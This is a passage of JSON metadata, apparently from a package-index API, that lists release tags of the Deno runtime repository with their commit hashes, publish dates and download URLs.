name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/